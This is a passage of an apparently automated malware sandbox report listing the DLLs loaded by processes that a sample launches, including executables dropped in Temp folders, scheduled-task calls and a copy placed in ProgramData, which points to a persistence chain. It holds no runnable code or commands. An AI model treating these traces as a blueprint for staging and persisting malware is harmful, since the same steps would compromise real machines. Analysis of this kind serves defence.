Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: apphelp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rstrtmgr.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncrypt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d11.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxgi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: resourcepolicyclient.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d10warp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: webio.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winnsi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: fwpuclnt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: schannel.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mskeyprotect.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncryptsslp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: msasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: gpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: vaultcli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wintypes.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wldp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntmarta.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rstrtmgr.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncrypt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d11.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxgi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: resourcepolicyclient.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d10warp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: webio.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winnsi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: fwpuclnt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: schannel.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mskeyprotect.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncryptsslp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: msasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: gpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: vaultcli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wintypes.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wldp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntmarta.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Google Drive.lnk.17.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.17.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.17.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.17.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.17.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.17.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Automated click: OK
